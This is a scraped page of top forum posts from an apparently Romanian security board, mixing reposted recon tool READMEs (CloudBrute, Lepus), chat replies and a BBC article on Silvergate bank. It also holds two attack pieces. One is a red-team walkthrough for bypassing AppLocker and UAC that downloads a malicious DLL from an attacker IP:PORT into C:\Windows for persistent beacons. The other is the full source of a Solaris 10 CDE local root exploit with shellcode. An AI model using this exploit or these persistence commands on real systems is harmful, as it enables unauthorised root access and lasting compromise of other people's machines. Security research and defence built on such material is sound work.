CloudBrute. ██████╗██╗ ██████╗ ██╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗████████╗███████╗ ██╔════╝██║ ██╔═══██╗██║ ██║██╔══██╗██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝ ██║ ██║ ██║ ██║██║ ██║██║ ██║██████╔╝██████╔╝██║ ██║ ██║ █████╗ ██║ ██║ ██║ ██║██║ ██║██║ ██║██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗ ╚═════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝ V 1.0.7 usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>" -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"] [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite] [-m|--mode "<value>"] [-o|--output "<value>"] [-C|--configFolder "<value>"] Awesome Cloud Enumerator Arguments: -h --help Print help information -d --domain domain -k --keyword keyword used to generator urls -w --wordlist path to wordlist -c --cloud force a search, check config.yaml providers list -t --threads number of threads. Default: 80 -T --timeout timeout per request in seconds. Default: 10 -p --proxy use proxy list -a --randomagent user agent randomization -D --debug show debug logs. Default: false -q --quite suppress all output. Default: false -m --mode storage or app. Default: storage -o --output Output file. Default: out.txt -C --configFolder Config path. Default: config for example CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt" please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments If a cloud provider not detected or want force searching on a specific provider, you can use -c option. CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt Dev Clone the repo go build -o CloudBrute main.go go test internal in action How to contribute Add a module or fix something and then pull request. Share it with whomever you believe can use it. Do the extra work and share your findings with community ♥ FAQ How to make the best out of this tool? Read the usage. I get errors; what should I do? Make sure you read the usage correctly, and if you think you found a bug open an issue. When I use proxies, I get too many errors, or it's too slow? It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider. too fast or too slow ? change -T (timeout) option to get best results for your run. Credits Inspired by every single repo listed here . Sursa: https://github.com/0xsha/CloudBrute
    3 points
  10. Da, este un internship plătit.
    3 points
  11. Trebuie sa ai in vedere un contabil bun pentru aceasta treaba. In cazul tau pot sa il recomand pe @Che , te ajuta si la cpa si la contabilitate
    3 points
  12. https://www.yougetsignal.com/tools/web-sites-on-web-server/ e.x
    3 points
  13. Momentan nu am definit retention period pe data. Cel mai probabil 1-3 luni maximum. Dupa 3 luni logurile de securitate nu mai devin relevante. Cu toate astea cu siguranta vor exista clienti care vor cere un retention period de 1-2 ani pentru audit de securitate (cel mai probabil ca un backup la solutia lor). Cat de curant vor exista rapoarte definite pe anumite intervale de timp si anumite scopuri (gen management). Da, bruteforce este suportat. Abuse se refera la un CTI community driven si anume abuseipdb.com Ai dreptate, momental il poti doar crea via register si adauga in organizatia ta. Vom face acel Send Invitation sa functioneze (momentan nu trimite nici un email). E o idee foarte buna pentru organizatiile care au 1-2 site-uri dar daca ai 50 nu prea mai are sens. Vom avea o chestie numita favourite host/site si by default vom afisa chestiile specifice acelui site. Mersi de sugestie, ne vom gandi cum putem sa facem sa se vada mai facil partea aceasta de site-uri (inafara de a da click pe Hosts). Legat de cloud, cel mai important e modul in care aplicatia ta web ruleaza. Noi in spate avem un API si putem sa acceptam inputul de la orice metoda de a capta datele si a le trimite catre un API. Cu siguranta vom avea integrare directa cu cloud-urile mari prin chestiile lor native. Avem partea de Message Queue si scalam prin K8s.
    3 points
  14. wordpress 2performant au direct plugin
    2 points
  15. Am incercat, e limita pe vector
    2 points
  16. assume-breach Jan 20 Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. In this installment, we’re going to bypass UAC and gain administrative persistence on a target without dropping EXEs to disk. Pretty cool, right? Getting Started If you haven’t read my previous post, you can find it here: Bypassing Applocker Using LNK Files. That post is going to show you how to set up your Powershell scripts, LNK file and so forth for initial access to the target. Since we still have access to our target, we’re going to start where we ended in our last article. Here’s the scenario: We have an administrative beacon in medium integrity through Havoc C2. You’ll notice that the process is Powershell. If we had used process injection in our shellcode dropper, we would have migrated to a different process like Explorer.exe or ApplicationFrameHost.exe (just something to think about). Running a “whoami” we see that our user, david, is part of the administrators group. In order for our persistence method to work, we need local admin. The reason being that we need access to “C:\Windows\” and this isn’t accessible to domain users or administrators unless we are in a high integrity beacon/process. So since this user is an admin, we can perform a UAC bypass. For this task, I prefer to use my own tool, HighBorn. HighBorn utilizes the Windows mock directory vulnerability to side load a DLL and execute it in high integrity. Using A UAC Bypass To Perform Administrative Actions A typical UAC Bypass is performed to get a high integrity beacon back to a C2. However, we can use HighBorn to perform administrative tasks on execution instead of getting a high integrity beacon. Let’s discuss the typical UAC Bypass to get a beacon back to Havoc. This is the usual workflow: Target downloads malicious EXE . 2. We run HighBorn in memory using inline-execute. 3. HighBorn performs the UAC Bypass and calls the EXE in high integrity. 4. We get a high integrity beacon. Since we are bypassing Applocker protections, we don’t have a dropper on disk. Remember, our beacon is running through a Powershell process. The UAC Bypass performs administrative code execution so we can tailor this to our needs. Since our need for this POC is persistence, we can change our execution from calling a malicious EXE to downloading a malicious DLL. DLL Side Loading For Persistence I’ve seen a few posts on this, mainly on LinkedIn, but there is a pretty popular DLL side loading vulnerability in Windows File Explorer. If you craft a malicious DLL and name it cscapi.dll, you can place it in C:\Windows\ and it will get executed when the user logs in. The caveat to this is that you must have local admin privileges to gain access to C:\Windows\. So let’s begin by creating a malicious DLL. Creating The Malicious DLL To create a malicious DLL, I prefer to use my own tool, Harriet. We choose option 2 to create our DLL. We then choose option 1 (the only option for now) and then we input all of our values. I chose to inject into Explorer.exe (you might want to change this process if you’re on a real pentest) and I named my DLL appropriately for the exploit. Modifying HighBorn.cs For Administrative Actions Now we need to craft a command to call out to cscapi.dll and download it into C:\Windows\. This is where HighBorn comes in. I navigate to the HighBorn folder and edit the HighBorn.c file. As you can see from the screenshot, this is a very simple DLL. We can use a easy Powershell command to download our cscapi.dll file into the Windows folder. powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’ However, if we try to compile this, we get escape sequence errors. Let’s encode our command into Base64 using Powershell. $str= “powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’ [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) Now we should have a good Base64 string. Let’s add it to HighBorn.c file. We then compile it per the command in the ReadMe.md file in the HighBorn folder. x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl, — subsystem,windows Now we have a secur32.dll file. In the HighBorn.cs file, we modify the exploit to put our IP and port to pull secur32.dll. Then we can compile HighBorn.exe with this command. mcs HighBorn.cs /out:HighBorn.exe We host secur32.dll and run our command in Havoc. On our python server, we see it pull secur32.dll and then it pulls our cscapi.dll file! Moving to our Windows folder on the target, we see that it has our DLL in place. Now remember, our cscapi.dll is a malicious DLL that will inject shellcode into Explorer.exe on login. Let’s reboot the target and see if we get a shellback. If all goes well, we should get a beacon in the Explorer.exe process on Havoc. And as user david logs in, we have our beacon! Pretty cool persistence technique! The biggest con to this technique is that you need admin privileges. However, if you can crack an admin password you can perform this technique on any user’s system for persistence on multiple workstations in the environment without having to drop an EXE to disk. Hopefully you found this article helpful or at least interesting. If you like my content you can follow me on here or on Twitter @assume_breach Sursa: https://assume-breach.medium.com/home-grown-red-team-bypassing-applocker-uac-and-getting-administrative-persistence-88b85c81343e
    2 points
  17. Lepus Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and perform port scans - and boy, is it fast! Basic Usage lepus.py yahoo.com Summary Enumeration modes Subdomain Takeover Port Scan Installation Arguments Full command example Enumeration modes The enumeration modes are different ways lepus uses to identify sudomains for a given domain. These modes are: Collectors Dictionary Permutations Reverse DNS Markov Moreover: For all methods, lepus checks if the given domain or any generated potential subdomain is a wildcard domain or not. After identification, lepus collects ASN and network information for the identified domains that resolve to public IP Addresses. Collectors The Collectors mode collects subdomains from the following services: Service API Required AlienVault OTX No Anubis-DB No Bevigil Yes BinaryEdge Yes BufferOver Yes C99 Yes Censys Yes CertSpotter No CommonCrawl No CRT No DNSDumpster No DNSRepo Yes DNSTrails Yes Farsight DNSDB Yes FOFA Yes Fullhunt Yes HackerTarget No HunterIO Yes IntelX Yes LeakIX Yes Maltiverse No Netlas Yes PassiveTotal Yes Project Discovery Chaos Yes RapidDNS No ReconCloud No Riddler Yes Robtex Yes SecurityTrails Yes Shodan Yes SiteDossier No ThreatBook Yes ThreatCrowd No ThreatMiner No URLScan Yes VirusTotal Yes Wayback Machine No Webscout No WhoisXMLAPI Yes ZoomEye Yes You can add your API keys in the config.ini file. The Collectors module will run by default on lepus. If you do not want to use the collectors during a lepus run (so that you don't exhaust your API key limits), you can use the -nc or --no-collectors argument. Dictionary The dictionary mode can be used when you want to provide lepus a list of subdomains. You can use the -w or --wordlist argument followed by the file. A custom list comes with lepus located at lists/subdomains.txt. An example run would be: lepus.py -w lists/subdomains.txt yahoo.com Permutations The Permutations mode performs changes on the list of subdomains that have been identified. For each subdomain, a number of permutations will take place based on the lists/words.txt file. You can also provide a custom wordlist for permutations with the -pw or --permutation-wordlist argument, followed by the file name.An example run would be: lepus.py --permutate yahoo.com or lepus.py --permutate -pw customsubdomains.txt yahoo.com ReverseDNS The ReverseDNS mode will gather all IP addresses that were resolved and perform a reverse DNS on each one in order to detect more subdomains. For example, if www.example.com resolves to 1.2.3.4, lepus will perform a reverse DNS for 1.2.3.4 and gather any other subdomains belonging to example.com, e.g. www2,internal or oldsite. To run the ReverseDNS module use the --reverse argument. Additionally, --ripe (or -ripe) can be used in order to instruct the module to query the RIPE database using the second level domain for potential network ranges. Moreover, lepus supports the --ranges (or -r) argument. You can use it to make reverse DNS resolutions against CIDRs that belong to the target domain. By default this module will take into account all previously identified IPs, then defined ranges, then ranges identified through the RIPE database. In case you only want to run the module against specific or RIPE identified ranges, and not against all already identified IPs, you can use the --only-ranges (-or) argument. An example run would be: lepus.py --reverse yahoo.com or lepus.py --reverse -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com or only against the defined or identified from RIPE lepus.py --reverse -or -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com Hint: lepus will identify ASNs and Networks during enumeration, so you can also use these ranges to identify more subdomains with a subsequent run. Markov With this module, Lepus will utilize Markov chains in order to train itself and then generate subdomain based on the already known ones. The bigger the general surface, the better the tool will be able to train itself and subsequently, the better the results will be. The module can be activated with the --markovify argument. Parameters also include the Markov state size, the maximum length of the generated candidate addition, and the quantity of generated candidates. Predefined values are 3, 5 and 5 respectively. Those arguments can be changed with -ms (--markov-state), -ml (--markov-length) and -mq (--markov-quantity) to meet your needs. Keep in mind that the larger these values are, the more time Lepus will need to generate the candidates. It has to be noted that different executions of this module might generate different candidates, so feel free to run it a few times consecutively. Keep in mind that the higher the -ms, -ml and -mq values, the more time will be needed for candidate generation. lepus.py --markovify yahoo.com or lepus.py --markovify -ms 5 -ml 10 -mq 10 Subdomain Takeover Lepus has a list of signatures in order to identify if a domain can be taken over. You can use it by providing the --takeover argument. This module also supports Slack notifications, once a potential takeover has been identified, by adding a Slack token in the config.ini file. The checks are made against the following services: Acquia Activecampaign Aftership Aha! Airee Amazon AWS/S3 Apigee Azure Bigcartel Bitbucket Brightcove Campaign Monitor Cargo Collective Desk Feedpress Fly.io Getresponse Ghost.io Github Hatena Helpjuice Helpscout Heroku Instapage Intercom JetBrains Kajabi Kayako Launchrock Mashery Maxcdn Moosend Ning Pantheon Pingdom Readme.io Simplebooklet Smugmug Statuspage Strikingly Surge.sh Surveygizmo Tave Teamwork Thinkific Tictail Tilda Tumblr Uptime Robot UserVoice Vend Webflow Wishpond Wordpress Zendesk Port Scan The port scan module will check open ports against a target and log them in the results. You can use the --portscan argument which by default will scan ports 80, 443, 8000, 8080, 8443. You can also use custom ports or choose a predefined set of ports. Ports set Ports small 80, 443 medium (default) 80, 443, 8000, 8080, 8443 large 80, 81, 443, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 9000, 9090, 9443 huge 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9943, 9980, 9981, 12443, 16080, 18091, 18092, 20720, 28017 An example run would be: lepus.py --portscan yahoo.com or lepus.py --portscan -p huge yahoo.com or lepus.py --portscan -p 80,443,8082,65123 yahoo.com Installation Normal installation: $ python3.7 -m pip install -r requirements.txt Preferably install in a virtualenv: $ pyenv virtualenv 3.7.4 lepus $ pyenv activate lepus $ pip install -r requirements.txt Installing latest python on debian: $ apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget $ curl -O https://www.python.org/ftp/python/3.7.4/Python-3.7.4.tar.xz $ tar -xf Python-3.7.4.tar.xz $ cd Python-3.7.4 $ ./configure --enable-optimizations --enable-loadable-sqlite-extensions $ make $ make altinstall Arguments usage: lepus.py [-h] [-w WORDLIST] [-hw] [-t THREADS] [-nc] [-zt] [--permutate] [-pw PERMUTATION_WORDLIST] [--reverse] [-r RANGES] [--portscan] [-p PORTS] [--takeover] [--markovify] [-ms MARKOV_STATE] [-ml MARKOV_LENGTH] [-mq MARKOV_QUANTITY] [-f] [-v] domain Infrastructure OSINT positional arguments: domain domain to search optional arguments: -h, --help show this help message and exit -w WORDLIST, --wordlist WORDLIST wordlist with subdomains -hw, --hide-wildcards hide wildcard resolutions -t THREADS, --threads THREADS number of threads [default is 100] -nc, --no-collectors skip passive subdomain enumeration -zt, --zone-transfer attempt to zone transfer from identified name servers --permutate perform permutations on resolved domains -pw PERMUTATION_WORDLIST, --permutation-wordlist PERMUTATION_WORDLIST wordlist to perform permutations with [default is lists/words.txt] --reverse perform reverse dns lookups on resolved public IP addresses -ripe, --ripe query ripe database with the 2nd level domain for networks to be used for reverse lookups -r RANGES, --ranges RANGES comma seperated ip ranges to perform reverse dns lookups on -or, --only-ranges use only ranges provided with -r or -ripe and not all previously identifed IPs --portscan scan resolved public IP addresses for open ports -p PORTS, --ports PORTS set of ports to be used by the portscan module [default is medium] --takeover check identified hosts for potential subdomain take- overs --markovify use markov chains to identify more subdomains -ms MARKOV_STATE, --markov-state MARKOV_STATE markov state size [default is 3] -ml MARKOV_LENGTH, --markov-length MARKOV_LENGTH max length of markov substitutions [default is 5] -mq MARKOV_QUANTITY, --markov-quantity MARKOV_QUANTITY max quantity of markov results per candidate length [default is 5] -f, --flush purge all records of the specified domain from the database -v, --version show program's version number and exit Full command example The following, is an example run with all available active arguments: ./lepus.py python.org --wordlist lists/subdomains.txt --permutate -pw ~/mypermsword.lst --reverse -ripe -r 10.11.12.0/24 --portscan -p huge --takeover --markovify -ms 3 -ml 10 -mq 10 The following command flushes all database entries for a specific domain: ./lepus.py python.org --flush Sursa: https://github.com/GKNSB/Lepus
    2 points
  18. Asta pt ca ai bani multi. Vezi ca degeaba tii portofelu deasupra daca simti o folie subtire peste taste sau ai o carcasa frumoasa :)). Mai bine nu scoti din Valcea bani.
    2 points
  19. Solaris 10 CDE local privilege escalation exploit that achieves root by injecting a fake printer via lpstat and uses a buffer overflow in libXM ParseColors(). /* * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info> * * "What has been will be again, * what has been done will be done again; * there is nothing new under the Sun." * -- Ecclesiastes 1:9 * * #Solaris #CDE #0day #ForeverDay #WontFix * * This exploit illustrates yet another way to abuse the infamous dtprintinfo * binary distributed with the Common Desktop Environment (CDE), a veritable * treasure trove for bug hunters since the 1990s. It's not the most reliable * exploit I've ever written, but I'm quite proud of the new vulnerabilities * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January * 2021) applied. The exploit chain is structured as follows: * 1. Inject a fake printer via the printer injection bug I found in lpstat. * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors(). * 3. Enjoy root privileges! * * For additional details on my bug hunting journey and on the vulnerabilities * themselves, you can refer to the official advisory: * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt * * Usage: * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall * $ ./raptor_dtprintlibXmas 10.0.0.109:0 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info> * * Using SI_PLATFORM : i86pc (5.10) * Using stack base : 0x8047fff * Using safe address : 0x8045790 * Using rwx_mem address : 0xfeffa004 * Using sc address : 0x8047fb4 * Using sprintf() address : 0xfefd1250 * Path of target binary : /usr/dt/bin/dtprintinfo * * On your X11 server: * 1. Select the "fnord" printer, then click on "Selected" > "Properties". * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu. * * Back to your original shell: * # id * uid=0(root) gid=1(other) * * IMPORTANT NOTE. * The buffer overflow corrupts some critical variables in memory, which we * need to fix. In order to do so, we must patch the hostile buffer at some * fixed locations with the first argument of the last call to ParseColors(). * The easiest way to get such a safe address is via the special 0x41414141 * command-line argument and truss, as follows: * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT * $ grep ParseColors OUT | tail -1 * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724) * ^^^^^^^^^ << this is the safe address we need * * Tested on: * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021) * [previous Solaris versions are also likely vulnerable] */ #include <fcntl.h> #include <link.h> #include <procfs.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/stat.h> #include <sys/systeminfo.h> #define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE" #define INFO2 "Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>" #define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program #define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging #define BUFSIZE 1106 // size of hostile buffer #define PADDING 1 // hostile buffer padding #define SAFE 0x08045770 // 1st arg to ParseColors() char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */ /* triple setuid() */ "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" /* execve() */ "\x31\xc0\x50\x68/ksh\x68/bin" "\x89\xe3\x50\x53\x89\xe2\x50" "\x52\x53\xb0\x3b\x50\xcd\x91"; /* globals */ char *arg[2] = {"foo", NULL}; char *env[256]; int env_pos = 0, env_len = 0; /* prototypes */ int add_env(char *string); void check_bad(int addr, char *name); int get_env_addr(char *path, char **argv); int search_ldso(char *sym); int search_rwx_mem(void); void set_val(char *buf, int pos, int val); /* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], cmd[1024], *vuln = VULN; char platform[256], release[256], display[256]; int i, sc_addr, safe_addr = SAFE; FILE *fp; int sb = ((int)argv[0] | 0xfff); // stack base int ret = search_ldso("sprintf"); // sprintf() in ld.so.1 int rwx_mem = search_rwx_mem(); // rwx memory /* helper that prints argv[0] address, used by get_env_addr() */ if (!strcmp(argv[0], arg[0])) { printf("0x%p\n", argv[0]); exit(0); } /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* process command line */ if ((argc < 2) || (argc > 3)) { fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n", argv[0]); exit(1); } snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]); if (argc > 2) { safe_addr = (int)strtoul(argv[2], (char **)NULL, 0); } /* enter debug mode */ if (safe_addr == 0x41414141) { unlink(DEBUG); snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG); if (system(cmd) == -1) { perror("error creating debug binary"); exit(1); } vuln = DEBUG; } /* fill envp while keeping padding */ add_env("LPDEST=fnord"); // injected printer add_env("HOME=/tmp"); // home directory add_env("PATH=/usr/bin:/bin"); // path sc_addr = add_env(display); // x11 display add_env(sc); // shellcode add_env(NULL); /* calculate shellcode address */ sc_addr += get_env_addr(vuln, argv); /* inject a fake printer */ unlink("/tmp/.printers"); unlink("/tmp/.printers.new"); if (!(fp = fopen("/tmp/.printers", "w"))) { perror("error injecting a fake printer"); exit(1); } fprintf(fp, "fnord :\n"); fclose(fp); link("/tmp/.printers", "/tmp/.printers.new"); /* craft the hostile buffer */ bzero(buf, sizeof(buf)); for (i = PADDING; i < BUFSIZE - 16; i += 4) { set_val(buf, i, ret); // sprintf() set_val(buf, i += 4, rwx_mem); // saved eip set_val(buf, i += 4, rwx_mem); // 1st arg set_val(buf, i += 4, sc_addr); // 2nd arg } memcpy(buf, "\"c c ", 5); // beginning of hostile buffer buf[912] = ' '; // string separator set_val(buf, 1037, safe_addr); // safe address set_val(buf, 1065, safe_addr); // safe address set_val(buf, 1073, 0xffffffff); // -1 /* create the hostile XPM icon files */ system("rm -fr /tmp/.dt"); mkdir("/tmp/.dt", 0755); mkdir("/tmp/.dt/icons", 0755); if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) { perror("error creating XPM icon files"); exit(1); } fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf); fclose(fp); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm"); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm"); /* print some output */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret); fprintf(stderr, "Path of target binary\t: %s\n\n", vuln); /* check for badchars */ check_bad(safe_addr, "safe address"); check_bad(rwx_mem, "rwx_mem address"); check_bad(sc_addr, "sc address"); check_bad(ret, "sprintf() address"); /* run the vulnerable program */ execve(vuln, arg, env); perror("execve"); exit(0); } /* * add_env(): add a variable to envp and pad if needed */ int add_env(char *string) { int i; /* null termination */ if (!string) { env[env_pos] = NULL; return env_len; } /* add the variable to envp */ env[env_pos] = string; env_len += strlen(string) + 1; env_pos++; /* pad envp using zeroes */ if ((strlen(string) + 1) % 4) for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { env[env_pos] = string + strlen(string); env_len++; } return env_len; } /* * check_bad(): check an address for the presence of badchars */ void check_bad(int addr, char *name) { int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP for (i = 0; i < sizeof(bad) / sizeof(int); i++) { if (((addr & 0xff) == bad[i]) || ((addr & 0xff00) == bad[i]) || ((addr & 0xff0000) == bad[i]) || ((addr & 0xff000000) == bad[i])) { fprintf(stderr, "error: %s contains a badchar\n", name); exit(1); } } } /* * get_env_addr(): get environment address using a helper program */ int get_env_addr(char *path, char **argv) { char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; char hex[11]; int fd[2], addr; /* truncate program name at correct length and create a hard link */ prog[strlen(path)] = '\0'; unlink(prog); link(argv[0], prog); /* open pipe to read program output */ if (pipe(fd) == -1) { perror("pipe"); exit(1); } switch(fork()) { case -1: /* cannot fork */ perror("fork"); exit(1); case 0: /* child */ dup2(fd[1], 1); close(fd[0]); close(fd[1]); execve(prog, arg, env); perror("execve"); exit(1); default: /* parent */ close(fd[1]); read(fd[0], hex, sizeof(hex)); break; } /* check address */ if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) { fprintf(stderr, "error: cannot read address from helper\n"); exit(1); } return addr + strlen(arg[0]) + 1; } /* * search_ldso(): search for a symbol inside ld.so.1 */ int search_ldso(char *sym) { int addr; void *handle; Link_map *lm; /* open the executable object file */ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { perror("dlopen"); exit(1); } /* get dynamic load information */ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { perror("dlinfo"); exit(1); } /* search for the address of the symbol */ if ((addr = (int)dlsym(handle, sym)) == NULL) { fprintf(stderr, "sorry, function %s() not found\n", sym); exit(1); } /* close the executable object file */ dlclose(handle); return addr; } /* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */ int search_rwx_mem(void) { int fd; char tmp[16]; prmap_t map; int addr = 0, addr_old; /* open the proc filesystem */ sprintf(tmp,"/proc/%d/map", (int)getpid()); if ((fd = open(tmp, O_RDONLY)) < 0) { fprintf(stderr, "can't open %s\n", tmp); exit(1); } /* search for the last RWX memory segment before stack (last - 1) */ while (read(fd, &map, sizeof(map))) if (map.pr_vaddr) if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { addr_old = addr; addr = map.pr_vaddr; } close(fd); /* add 4 to the exact address NUL bytes */ if (!(addr_old & 0xff)) addr_old |= 0x04; if (!(addr_old & 0xff00)) addr_old |= 0x0400; return addr_old; } /* * set_val(): copy a dword inside a buffer (little endian) */ void set_val(char *buf, int pos, int val) { buf[pos] = (val & 0x000000ff); buf[pos + 1] = (val & 0x0000ff00) >> 8; buf[pos + 2] = (val & 0x00ff0000) >> 16; buf[pos + 3] = (val & 0xff000000) >> 24; } Source
    2 points
  20. Mai amuzant e că Kev ăsta nici nu era născut când foloseai Solaris pe ultrasparc. 🤭
    2 points
  21. Recomand Zitec. Am lucrat acolo acum ceva ani si a fost misto. Am vazut ca a crescut enorm in ultimii ani, deci nu pot decat sa presupun ca e si mai misto acum.
    2 points
  22. Practic faceti un fel de ElasticSearch + FileBeat + Kibana, cu un focus pe securitate pentru request-uri?
    2 points
  23. Bre kev, daca nu intelegi despre ce e vorba, de ce saracia mai murdaresti topicul omului? Zici ca suntem in desene animate cu muppets
    2 points
  24. Mesaj catre ISP Eu: ISP: Eu: ISP: Scuze pentru dublu post, am zis ca nu apare notificare pentru edit
    2 points
  25. Customers of US bank Silvergate, which provides cryptocurrency services, have withdrawn over $8bn (£6.7bn) of their crypto-linked deposits. Around two-thirds of the bank's customers pulled their deposits in the final three months of 2022. The bank has sold $5.2bn in assets to cover the cost and remain liquid. It came as three US regulators warned banks that issuing or holding crypto was "highly likely to be inconsistent with safe and sound banking practices". Silvergate is a bank listed on the New York Stock Exchange, and is therefore regulated within the financial sector. It is one of a small handful of businesses within this sector that provides cryptocurrency services. The withdrawals followed the collapse of the FTX crypto exchange, which was once valued at $32bn before its bankruptcy filing in November. Former FTX boss Sam Bankman-Fried has pleaded not guilty to charges that he defrauded customers and investors. Prosecutors say as many as one million creditors may have lost their money. The case has shaken the entire crypto industry, sparking bankruptcy filings at other firms and declines in crypto values. Alan Lane, chief executive of Silvergate, said the bank was selling assets to cover the withdrawals by customers "in response to the rapid changes in the digital asset industry". Silvergate is the latest victim of the chilling "crypto winter" that's been whipping through the industry since last spring. The so-called crypto bank occupied a fairly unique position in the market acting as a bank for cryptocurrency companies which struggled to get banking services from traditional sources. One of its customers was the now bankrupt Alameda Research - owned by Sam Bankman-Fried who awaits trial in the US accused of fraud. That in itself is a blow for Silvergate but Bankman-Fried's downfall has delivered a bigger blow to the company - market confidence. Since Bankman-Fried's empire collapsed, investors large and small have been pulling their money out of crypto companies with billions transferred from companies that store crypto funds. So far the biggest companies in the space like Binance and Coinbase have survived the unprecedented withdrawals and it appears as though Silvergate is weathering the storm too for now but at a huge cost to its balance sheet. Silvergate was a small US bank before it entered the world of cryptocurrency, and went public in November 2019. At the market's peak in 2021, its shares had grown by more than 1,500%, in no small part due to the massive growth of crypto in this period. During this time it tried to launch its own stablecoin - a form of cryptocurrency which is directly tied to an asset such as gold, the US dollar or other cryptocurrencies. And in January 2022, Silvergate spent $182m to acquire the technology behind Meta's proposed Diem (formerly Libra) stablecoin that never saw the light of day. In a filing to the US Securities and Exchange Commission, the bank said it had sold debt to cover the withdrawals and had written off the Diem purchase, meaning it is no longer counted as an asset. It has also reduced its staff by 40% - around 200 people - and altogether the withdrawals have caused the bank to lose $718m, a total higher than its profit since 2013. Via bbc.com
    2 points
